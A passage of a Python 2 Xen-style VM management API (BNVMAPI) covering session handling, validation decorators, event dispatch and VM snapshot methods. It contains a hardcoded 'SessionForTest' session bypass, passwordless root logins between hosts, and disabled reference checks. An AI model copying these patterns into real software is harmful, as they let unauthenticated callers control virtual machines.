return xen_api_error("Invalid ip for rpc call")
# create
proxy = ServerProxy("http://" + ip + ":9363/")
# login
response = proxy.session.login('root')
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
session_ref = response['Value']
# excute
method_parts = method.split('_')
method_class = method_parts[0]
method_name = '_'.join(method_parts[1:])
if method.find("host_metrics") == 0:
method_class = "host_metrics"
method_name = '_'.join(method_parts[2:])
#log.debug(method_class)
#log.debug(method_name)
if method_class.find("Async") == 0:
method_class = method_class.split(".")[1]
response = proxy.__getattr__("Async").__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
else:
response = proxy.__getattr__(method_class).__getattr__(method_name)(session_ref, *args)
if cmp(response['Status'], 'Failure') == 0:
log.exception(response['ErrorDescription'])
return xen_api_error(response['ErrorDescription'])
# result
return response
except socket.error:
return xen_api_error('socket error')
def xen_api_todo():
"""Temporary method to make sure we track down all the TODOs"""
return {"Status": "Error", "ErrorDescription": XEND_ERROR_TODO}
def now():
return datetime()
def datetime(when = None):
"""Marshall the given time as a Xen-API DateTime.
@param when The time in question, given as seconds since the epoch, UTC.
May be None, in which case the current time is used.
"""
if when is None:
return xmlrpclib.DateTime(time.gmtime())
else:
return xmlrpclib.DateTime(time.gmtime(when))
# -----------------------------
# Bridge to Legacy XM API calls
# -----------------------------
def do_vm_func(fn_name, vm_ref, *args, **kwargs):
"""Helper wrapper func to abstract away from repetitive code.
@param fn_name: function name for XendDomain instance
@type fn_name: string
@param vm_ref: vm_ref
@type vm_ref: string
@param *args: more arguments
@type *args: tuple
"""
try:
xendom = XendDomain.instance()
fn = getattr(xendom, fn_name)
xendom.do_legacy_api_with_uuid(fn, vm_ref, *args, **kwargs)
return xen_api_success_void()
except VMBadState, exn:
return xen_api_error(['VM_BAD_POWER_STATE', vm_ref, exn.expected,
exn.actual])
# ---------------------------------------------------
# Event dispatch
# ---------------------------------------------------
EVENT_QUEUE_LENGTH = 50
event_registrations = {}
def event_register(session, reg_classes):
if session not in event_registrations:
event_registrations[session] = {
'classes' : set(),
'queue' : Queue.Queue(EVENT_QUEUE_LENGTH),
'next-id' : 1
}
if not reg_classes:
reg_classes = classes
sessionclasses = event_registrations[session]['classes']
if hasattr(sessionclasses, 'union_update'):
sessionclasses.union_update(reg_classes)
else:
sessionclasses.update(reg_classes)
def event_unregister(session, unreg_classes):
if session not in event_registrations:
return
if unreg_classes:
event_registrations[session]['classes'].intersection_update(
unreg_classes)
if len(event_registrations[session]['classes']) == 0:
del event_registrations[session]
else:
del event_registrations[session]
def event_next(session):
if session not in event_registrations:
return xen_api_error(['SESSION_NOT_REGISTERED', session])
queue = event_registrations[session]['queue']
events = [queue.get()]
try:
while True:
events.append(queue.get(False))
except Queue.Empty:
pass
return xen_api_success(events)
def _ctor_event_dispatch(xenapi, ctor, api_cls, session, args):
result = ctor(xenapi, session, *args)
if result['Status'] == 'Success':
ref = result['Value']
event_dispatch('add', api_cls, ref, '')
return result
def _dtor_event_dispatch(xenapi, dtor, api_cls, session, ref, args):
result = dtor(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('del', api_cls, ref, '')
return result
def _setter_event_dispatch(xenapi, setter, api_cls, attr_name, session, ref,
args):
result = setter(xenapi, session, ref, *args)
if result['Status'] == 'Success':
event_dispatch('mod', api_cls, ref, attr_name)
return result
def event_dispatch(operation, api_cls, ref, attr_name):
assert operation in ['add', 'del', 'mod']
event = {
'timestamp' : now(),
'class' : api_cls,
'operation' : operation,
'ref' : ref,
'obj_uuid' : ref,
'field' : attr_name,
}
for reg in event_registrations.values():
if api_cls in reg['classes']:
event['id'] = reg['next-id']
reg['next-id'] += 1
reg['queue'].put(event)
# ---------------------------------------------------
# Python Method Decorators for input value validation
# ---------------------------------------------------
def trace(func, api_name=''):
"""Decorator to trace XMLRPC Xen API methods.
@param func: function with any parameters
@param api_name: name of the api call for debugging.
"""
if hasattr(func, 'api'):
api_name = func.api
def trace_func(self, *args, **kwargs):
log.debug('%s: %s' % (api_name, args))
return func(self, *args, **kwargs)
trace_func.api = api_name
return trace_func
def catch_typeerror(func):
"""Decorator to catch any TypeErrors and translate them into Xen-API
errors.
@param func: function with params: (self, ...)
@rtype: callable object
"""
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except TypeError, exn:
#log.exception('catch_typeerror')
if hasattr(func, 'api') and func.api in argcounts:
# Assume that if the argument count was wrong and if the
# exception was thrown inside this file, then it is due to an
# invalid call from the client, otherwise it's an internal
# error (which will be handled further up).
expected = argcounts[func.api]
actual = len(args) + len(kwargs)
if expected != actual:
tb = sys.exc_info()[2]
try:
sourcefile = traceback.extract_tb(tb)[-1][0]
if sourcefile == inspect.getsourcefile(BNVMAPI):
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
func.api, expected, actual])
finally:
del tb
raise
except XendAPIError, exn:
return xen_api_error(exn.get_api_error())
return f
def session_required(func):
"""Decorator to verify if session is valid before calling method.
@param func: function with params: (self, session, ...)
@rtype: callable object
"""
def check_session(self, session, *args, **kwargs):
if auth_manager().is_session_valid(session) or cmp(session, "SessionForTest") == 0:
return func(self, session, *args, **kwargs)
else:
return xen_api_error(['SESSION_INVALID', session])
return check_session
def _is_valid_ref(ref, validator):
return type(ref) == str and validator(ref)
def _check_ref(validator, clas, func, api, session, ref, *args, **kwargs):
# if _is_valid_ref(ref, validator):
return func(api, session, ref, *args, **kwargs)
# else:
# return xen_api_error(['HANDLE_INVALID', clas, ref])
def _check_vm(validator, clas, func, api, session, ref, *args, **kwargs):
# for host_ref in BNPoolAPI._host_structs.keys():
# if BNPoolAPI._host_structs[host_ref]['VMs'].has_key(ref):
if BNPoolAPI.check_vm(ref):
return func(api, session, ref, *args, **kwargs)
return xen_api_error(['VM_NOT_FOUND', clas, ref])
def _check_console(validator, clas, func, api, session, ref, *args, **kwargs):
#if BNPoolAPI._consoles_to_VM.has_key(ref):
return func(api, session, ref, *args, **kwargs)
#else:
return xen_api_error(['HANDLE_INVALID', clas, ref])
def valid_object(class_name):
"""Decorator to verify if object is valid before calling
method.
@param func: function with params: (self, session, pif_ref)
@rtype: callable object
"""
return lambda func: \
lambda *args, **kwargs: \
_check_ref(lambda r: \
XendAPIStore.get(r, class_name) is not None,
class_name, func, *args, **kwargs)
def valid_task(func):
"""Decorator to verify if task_ref is valid before calling
method.
@param func: function with params: (self, session, task_ref)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(XendTaskManager.get_task,
'task', func, *args, **kwargs)
def valid_vm(func):
"""Decorator to verify if vm_ref is valid before calling method.
@param func: function with params: (self, session, vm_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_vm(XendDomain.instance().is_valid_vm,
'VM', func, *args, **kwargs)
def valid_vbd(func):
"""Decorator to verify if vbd_ref is valid before calling method.
@param func: function with params: (self, session, vbd_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD', func, *args, **kwargs)
def valid_vbd_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vbd', r),
'VBD_metrics', func, *args, **kwargs)
def valid_vif(func):
"""Decorator to verify if vif_ref is valid before calling method.
@param func: function with params: (self, session, vif_ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF', func, *args, **kwargs)
def valid_vif_metrics(func):
"""Decorator to verify if ref is valid before calling method.
@param func: function with params: (self, session, ref, ...)
@rtype: callable object
"""
return lambda *args, **kwargs: \
_check_ref(lambda r: XendDomain.instance().is_valid_dev('vif', r),
'VIF_metrics', func, *args, **kwargs)
def valid_console(func):
"""Decorator to verify if console_ref is valid before calling method.
@param func: function with params: (self, session, console_ref, ...)
@rtype: callable object
"""
return lambda * args, **kwargs: \
_check_console(lambda r: XendDomain.instance().is_valid_dev('console',
r),
'console', func, *args, **kwargs)
classes = {
'session' : None,
'VM' : valid_vm,
'VBD' : valid_vbd,
'VBD_metrics' : valid_vbd_metrics,
'VIF' : valid_vif,
'VIF_metrics' : valid_vif_metrics,
'console' : valid_console,
'task' : valid_task,
}
def singleton(cls, *args, **kw):
instances = {}
def _singleton(*args, **kw):
if cls not in instances:
instances[cls] = cls(*args, **kw)
return instances[cls]
return _singleton
@singleton
class BNVMAPI(object):
__decorated__ = False
__init_lock__ = threading.Lock()
__vm_clone_lock__ = threading.Lock()
__vm_change_host_lock__ = threading.Lock()
__set_passwd_lock__ = threading.Lock()
__vbd_lock__ = threading.Lock()
def __new__(cls, *args, **kwds):
""" Override __new__ to decorate the class only once.
Lock to make sure the classes are not decorated twice.
"""
cls.__init_lock__.acquire()
try:
if not cls.__decorated__:
cls._decorate()
cls.__decorated__ = True
return object.__new__(cls, *args, **kwds)
finally:
cls.__init_lock__.release()
def _decorate(cls):
""" Decorate all the object methods to have validators
and appropriate function attributes.
This should only be executed once for the duration of the
server.
"""
global_validators = [session_required, catch_typeerror]
# Cheat methods _hosts_name_label
# -------------
# Methods that have a trivial implementation for all classes.
# 1. get_by_uuid == getting by ref, so just return uuid for
# all get_by_uuid() methods.
for api_cls in classes.keys():
# We'll let the autoplug classes implement these functions
# themselves - its much cleaner to do it in the base class
get_by_uuid = '%s_get_by_uuid' % api_cls
get_uuid = '%s_get_uuid' % api_cls
get_all_records = '%s_get_all_records' % api_cls
def _get_by_uuid(_1, _2, ref):
return xen_api_success(ref)
def _get_uuid(_1, _2, ref):
return xen_api_success(ref)
def unpack(v):
return v.get('Value')
def _get_all_records(_api_cls):
return lambda s, session: \
xen_api_success(dict([(ref, unpack(getattr(cls, '%s_get_record' % _api_cls)(s, session, ref)))\
for ref in unpack(getattr(cls, '%s_get_all' % _api_cls)(s, session))]))
setattr(cls, get_by_uuid, _get_by_uuid)
setattr(cls, get_uuid, _get_uuid)
setattr(cls, get_all_records, _get_all_records(api_cls))
# Autoplugging classes
# --------------------
# These have all of their methods grabbed out from the implementation
# class, and wrapped up to be compatible with the Xen-API.
def getter(ref, type):
return XendAPIStore.get(ref, type)
def wrap_method(name, new_f):
try:
f = getattr(cls, name)
wrapped_f = (lambda * args: new_f(f, *args))
wrapped_f.api = f.api
wrapped_f.async = f.async
setattr(cls, name, wrapped_f)
except AttributeError:
# Logged below (API call: %s not found)
pass
def setter_event_wrapper(api_cls, attr_name):
setter_name = '%s_set_%s' % (api_cls, attr_name)
wrap_method(
setter_name,
lambda setter, s, session, ref, *args:
_setter_event_dispatch(s, setter, api_cls, attr_name,
session, ref, args))
def ctor_event_wrapper(api_cls):
ctor_name = '%s_create' % api_cls
wrap_method(
ctor_name,
lambda ctor, s, session, *args:
_ctor_event_dispatch(s, ctor, api_cls, session, args))
def dtor_event_wrapper(api_cls):
dtor_name = '%s_destroy' % api_cls
wrap_method(
dtor_name,
lambda dtor, s, session, ref, *args:
_dtor_event_dispatch(s, dtor, api_cls, session, ref, args))
# Wrapping validators around XMLRPC calls
# ---------------------------------------
for api_cls, validator in classes.items():
def doit(n, takes_instance, async_support=False,
return_type=None):
n_ = n.replace('.', '_')
try:
f = getattr(cls, n_)
if n not in argcounts:
argcounts[n] = f.func_code.co_argcount - 1
validators = takes_instance and validator and \
[validator] or []
validators += global_validators
for v in validators:
f = v(f)
f.api = n
f.async = async_support
if return_type:
f.return_type = return_type
setattr(cls, n_, f)
except AttributeError:
log.warn("API call: %s not found" % n)
ro_attrs = getattr(cls, '%s_attr_ro' % api_cls, []) \
+ cls.Base_attr_ro
rw_attrs = getattr(cls, '%s_attr_rw' % api_cls, []) \
+ cls.Base_attr_rw
methods = getattr(cls, '%s_methods' % api_cls, []) \
+ cls.Base_methods
funcs = getattr(cls, '%s_funcs' % api_cls, []) \
+ cls.Base_funcs
# wrap validators around readable class attributes
for attr_name in ro_attrs + rw_attrs:
doit('%s.get_%s' % (api_cls, attr_name), True,
async_support=False)
# wrap validators around writable class attrributes
for attr_name in rw_attrs:
doit('%s.set_%s' % (api_cls, attr_name), True,
async_support=False)
setter_event_wrapper(api_cls, attr_name)
# wrap validators around methods
for method_name, return_type in methods:
doit('%s.%s' % (api_cls, method_name), True,
async_support=True)
# wrap validators around class functions
for func_name, return_type in funcs:
doit('%s.%s' % (api_cls, func_name), False,
async_support=True,
return_type=return_type)
ctor_event_wrapper(api_cls)
dtor_event_wrapper(api_cls)
_decorate = classmethod(_decorate)
def __init__(self, auth):
self.auth = auth
Base_attr_ro = ['uuid']
Base_attr_rw = ['name_label', 'name_description']
Base_methods = [('get_record', 'Struct')]
Base_funcs = [('get_all', 'Set'), ('get_by_uuid', None), ('get_all_records', 'Set')]
def _get_XendAPI_instance(self):
import XendAPI
return XendAPI.instance()
def _get_BNStorageAPI_instance(self):
import BNStorageAPI
return BNStorageAPI.instance()
# Xen API: Class Session
# ----------------------------------------------------------------
# NOTE: Left unwrapped by __init__
session_attr_ro = ['this_host', 'this_user', 'last_active']
session_methods = [('logout', None)]
def session_get_all(self, session):
return xen_api_success([session])
def session_login(self, username):
try:
session = auth_manager().login_unconditionally(username)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login.api = 'session.login'
def session_login_with_password(self, *args):
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
if len(args) < 2:
return xen_api_error(
['MESSAGE_PARAMETER_COUNT_MISMATCH',
'session.login_with_password', 2, len(args)])
username = args[0]
password = args[1]
try:
# session = ((self.auth == AUTH_NONE and
# auth_manager().login_unconditionally(username)) or
# auth_manager().login_with_password(username, password))
session = auth_manager().login_with_password(username, password)
return xen_api_success(session)
except XendError, e:
return xen_api_error(['SESSION_AUTHENTICATION_FAILED'])
session_login_with_password.api = 'session.login_with_password'
# object methods
def session_logout(self, session):
auth_manager().logout(session)
return xen_api_success_void()
def session_get_record(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
record = {'uuid' : session,
'this_host' : XendNode.instance().uuid,
'this_user' : auth_manager().get_user(session),
'last_active': now()}
return xen_api_success(record)
def session_get_uuid(self, session, self_session):
return xen_api_success(self_session)
def session_get_by_uuid(self, session, self_session):
return xen_api_success(self_session)
# attributes (ro)
def session_get_this_host(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
if not BNPoolAPI._isMaster and BNPoolAPI._inPool:
return xen_api_error(XEND_ERROR_HOST_IS_SLAVE)
return xen_api_success(XendNode.instance().uuid)
def session_get_this_user(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
user = auth_manager().get_user(session)
if user is not None:
return xen_api_success(user)
return xen_api_error(['SESSION_INVALID', session])
def session_get_last_active(self, session, self_session):
if self_session != session:
return xen_api_error(['PERMISSION_DENIED'])
return xen_api_success(now())
# Xen API: Class User
# ----------------------------------------------------------------
# Xen API: Class Tasks
# ----------------------------------------------------------------
task_attr_ro = ['name_label',
'name_description',
'status',
'progress',
'type',
'result',
'error_info',
'allowed_operations',
'session'
]
task_attr_rw = []
task_funcs = [('get_by_name_label', 'Set(task)'),
('cancel', None)]
def task_get_name_label(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_label)
def task_get_name_description(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.name_description)
def task_get_status(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.get_status())
def task_get_progress(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.progress)
def task_get_type(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.type)
def task_get_result(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.result)
def task_get_error_info(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.error_info)
def task_get_allowed_operations(self, session, task_ref):
return xen_api_success({})
def task_get_session(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
return xen_api_success(task.session)
def task_get_all(self, session):
tasks = XendTaskManager.get_all_tasks()
return xen_api_success(tasks)
def task_get_record(self, session, task_ref):
task = XendTaskManager.get_task(task_ref)
log.debug(task.get_record())
return xen_api_success(task.get_record())
def task_cancel(self, session, task_ref):
return xen_api_error('OPERATION_NOT_ALLOWED')
# def task_get_by_name_label(self, session, name):
# return xen_api_success(XendTaskManager.get_task_by_name(name))
# Xen API: Class VM
# ----------------------------------------------------------------
VM_attr_ro = ['power_state',
'resident_on',
'consoles',
'snapshots',
'VIFs',
'VBDs',
'VTPMs',
'DPCIs',
'DSCSIs',
'media',
'fibers',
'usb_scsi',
'DSCSI_HBAs',
'tools_version',
'domid',
'is_control_domain',
'metrics',
'crash_dumps',
'cpu_pool',
'cpu_qos',
'network_qos',
'VCPUs_CPU',
'ip_addr',
'MAC',
'is_local_vm',
'vnc_location',
'available_vbd_device',
'VIF_record',
'VBD_record',
'dev2path_list',
'pid2devnum_list',
'vbd2device_list',
'config',
'record_lite',
'inner_ip',
'system_VDI',
'network_record',
]
VM_attr_rw = ['name_label',
'name_description',
'user_version',
'is_a_template',
'auto_power_on',
'snapshot_policy',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_max',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label',
'pool_name',
'suspend_VDI',
'suspend_SR',
'VCPUs_affinity',
'tags',
'tag',
'rate',
'all_tag',
'all_rate',
'boot_order',
'IO_rate_limit',
# 'ip_map',
'passwd',
'config',
'platform_serial',
]
VM_methods = [('clone', 'VM'),
('clone_local', 'VM'),
('clone_MAC', 'VM'),
('clone_local_MAC', 'VM'),
('start', None),
('start_on', None),
('snapshot', None),
('rollback', None),
('destroy_snapshot', 'Bool'),
('destroy_all_snapshots', 'Bool'),
('pause', None),
('unpause', None),
('clean_shutdown', None),
('clean_reboot', None),
('hard_shutdown', None),
('hard_reboot', None),
('suspend', None),
('resume', None),
('send_sysrq', None),
('set_VCPUs_number_live', None),
('add_to_HVM_boot_params', None),
('remove_from_HVM_boot_params', None),
('add_to_VCPUs_params', None),
('add_to_VCPUs_params_live', None),
('remove_from_VCPUs_params', None),
('add_to_platform', None),
('remove_from_platform', None),
('add_to_other_config', None),
('remove_from_other_config', None),
('save', None),
('set_memory_dynamic_max_live', None),
('set_memory_dynamic_min_live', None),
('send_trigger', None),
('pool_migrate', None),
('migrate', None),
('destroy', None),
('cpu_pool_migrate', None),
('destroy_local', None),
('destroy_fiber', None),
('destroy_usb_scsi', None),
('destroy_media', None),
('destroy_VIF', None),
('disable_media', None),
('enable_media', None),
('eject_media', None),
('copy_sxp_to_nfs', None),
('media_change', None),
('add_tags', None),
('check_fibers_valid', 'Map'),
('check_usb_scsi_valid', 'Map'),
('can_start','Bool'),
('init_pid2devnum_list', None),
('clear_IO_rate_limit', None),
('clear_pid2devnum_list', None),
('start_set_IO_limit', None),
('start_init_pid2dev', None),
('create_image', 'Bool'),
('send_request_via_serial', 'Bool'),
# ('del_ip_map', None),
]
VM_funcs = [('create', 'VM'),
('create_on', 'VM'),
('create_from_sxp', 'VM'),
('create_from_vmstruct', 'VM'),
('restore', None),
('get_by_name_label', 'Set(VM)'),
('get_all_and_consoles', 'Map'),
('get_lost_vm_by_label', 'Map'),
('get_lost_vm_by_date', 'Map'),
('get_record_lite', 'Set'),
('create_data_VBD', 'Bool'),
('delete_data_VBD', 'Bool'),
('create_from_template', None),
('create_on_from_template', None),
('clone_system_VDI', 'VDI'),
('create_with_VDI', None),
]
# parameters required for _create()
VM_attr_inst = [
'name_label',
'name_description',
'user_version',
'is_a_template',
'is_local_vm',
'memory_static_max',
'memory_dynamic_max',
'memory_dynamic_min',
'memory_static_min',
'VCPUs_max',
'VCPUs_at_startup',
'VCPUs_params',
'actions_after_shutdown',
'actions_after_reboot',
'actions_after_suspend',
'actions_after_crash',
'PV_bootloader',
'PV_kernel',
'PV_ramdisk',
'PV_args',
'PV_bootloader_args',
'HVM_boot_policy',
'HVM_boot_params',
'platform',
'PCI_bus',
'other_config',
'security_label']
def VM_get(self, name, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@return: value of field.
@rtype: dict
'''
return xen_api_success(
XendDomain.instance().get_vm_by_uuid(vm_ref).info[name])
def VM_set(self, name, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM attribute value by name.
@param name: name of VM attribute field.
@param session: session of RPC.
@param vm_ref: uuid of VM.
@param value: new value of VM attribute field.
@return: True | False.
@rtype: dict
'''
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
dominfo.info[name] = value
return self._VM_save(dominfo)
def _VM_save(self, dominfo):
'''
@author: wuyuewen
@summary: Call config save function, the struct of VM will save to disk.
@param dominfo: VM config structure.
@return: True | False.
@rtype: dict.
'''
log.debug('VM_save')
XendDomain.instance().managed_config_save(dominfo)
return xen_api_success_void()
# attributes (ro)
def VM_get_power_state(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM power state by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_power_state(vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_power_state", vm_ref)
else:
return self._VM_get_power_state(vm_ref)
def _VM_get_power_state(self, vm_ref):
'''
@author: wuyuewen
@summary: Internal method.
@param vm_ref: uuid.
@return: power state.
@rtype: dict.
'''
# log.debug("in get power state")
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
return xen_api_success(dom.get_power_state())
# def VM_get_power_state(self, session, vm_ref):
# #host_ref = BNPoolAPI._VM_to_Host[vm_ref]
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# return xen_api_success(dom.get_power_state())
# else:
# try:
# remote_ip = BNPoolAPI._host_structs[host_ref]['ip']
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.VM.get_power_state(session_ref, vm_ref)
# except socket.error:
# return xen_api_error('socket error')
def VM_get_resident_on(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM resident Host.
@param session: session of RPC.
@param vm_ref: uuid.
@return: Host uuid.
@rtype: dict.
'''
#host_ref = BNPoolAPI._VM_to_Host[vm_ref]
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
return xen_api_success(host_ref)
def VM_get_snapshots(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshots(session, vdi_ref)
def _VM_get_vdi_snapshots(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM snapshots by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshots.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success([])
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value')
if not sr_rec:
log.debug('sr record do not exist>>>>>')
return xen_api_success([])
sr_type = sr_rec.get('type')
log.debug('sr type>>>>>>>>>>>>>>>%s' % sr_type)
if cmp(sr_type, 'gpfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_gpfs(mount_point, vdi_ref)
elif cmp(sr_type, 'mfs') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_mfs(mount_point, vdi_ref)
elif cmp(sr_type, 'ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
elif cmp(sr_type, 'local_ocfs2') == 0:
mount_point = sr_rec['mount_point']
log.debug('mount_point: %s' % mount_point)
proxy = ServerProxy("http://127.0.0.1:10010")
snapshots = proxy.get_snapshots_ocfs2(mount_point, vdi_ref)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshots = proxy.get_snapshots(sr, vdi_ref)
log.debug("snapshots : %s " % snapshots)
return xen_api_success(snapshots)
def VM_get_snapshot_policy(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@return: snapshot policy.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
log.debug('system vdi_ref: %s' % vdi_ref)
return self._VM_get_vdi_snapshot_policy(session, vdi_ref)
def _VM_get_vdi_snapshot_policy(self, session, vdi_ref):
'''
@author: wuyuewen
@summary: Interal method. Get VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@return: snapshot policy.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(False)
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
location = sr_rec['other_config']['location']
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = location.split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.get_snapshot_policy(sr, vdi_ref)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_set_snapshot_policy(self, session, vm_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vm_ref: uuid.
@param interval: the interval of create a snap, the unit is (day).
@param maxnum: the max number of snapshots keep.
@return: True | False.
@rtype: dict.
'''
vdi_ref = self.VM_get_system_VDI(session, vm_ref).get('Value')
return self._VM_set_vdi_snapshot_policy(session, vdi_ref, interval, maxnum)
def _VM_set_vdi_snapshot_policy(self, session, vdi_ref, interval, maxnum):
'''
@author: wuyuewen
@summary: Internal method. Set VM snapshot policy by uuid.
@param session: session of RPC.
@param vdi_ref: VM system VDI's uuid.
@param interval: the interval of create a snap, the unit is (day).
@param maxnum: the max number of snapshots keep.
@return: True | False.
@rtype: dict.
'''
storage = self._get_BNStorageAPI_instance()
vdi_rec = storage.VDI_get_record(session, vdi_ref).get('Value', '')
if not vdi_rec:
log.debug('VM_snapshot_vdi>>>>>vdi do not exist...')
return xen_api_success(("1", "100"))
sr = vdi_rec['SR']
log.debug("sr : %s>>>>>>>>>>" % sr)
sr_rec = storage._SR_get_record("", sr).get('Value', None)
if sr_rec:
sr_type = sr_rec.get('type')
if cmp(sr_type, 'gpfs') == 0 or cmp(sr_type, 'mfs') == 0\
or cmp(sr_type, 'ocfs2') == 0 or cmp(sr_type, 'local_ocfs2') == 0:
proxy = ServerProxy("http://127.0.0.1:10010")
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
else:
sr_ip = sr_rec['other_config']['location'].split(":")[0]
log.debug("sr rec : %s" % sr_rec)
log.debug("sr ip : %s" % sr_ip)
proxy = ServerProxy("http://%s:10010" % sr_ip)
snapshot_policy = proxy.set_snapshot_policy(sr, vdi_ref, interval, maxnum)
log.debug("snapshot_policy : %s " % snapshot_policy)
return xen_api_success(snapshot_policy)
else:
return xen_api_success(("1", "100"))
def VM_get_memory_static_max(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VM memory static max.
@param session: session of RPC.
@param vm_ref: uuid.
@return: memory static max.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
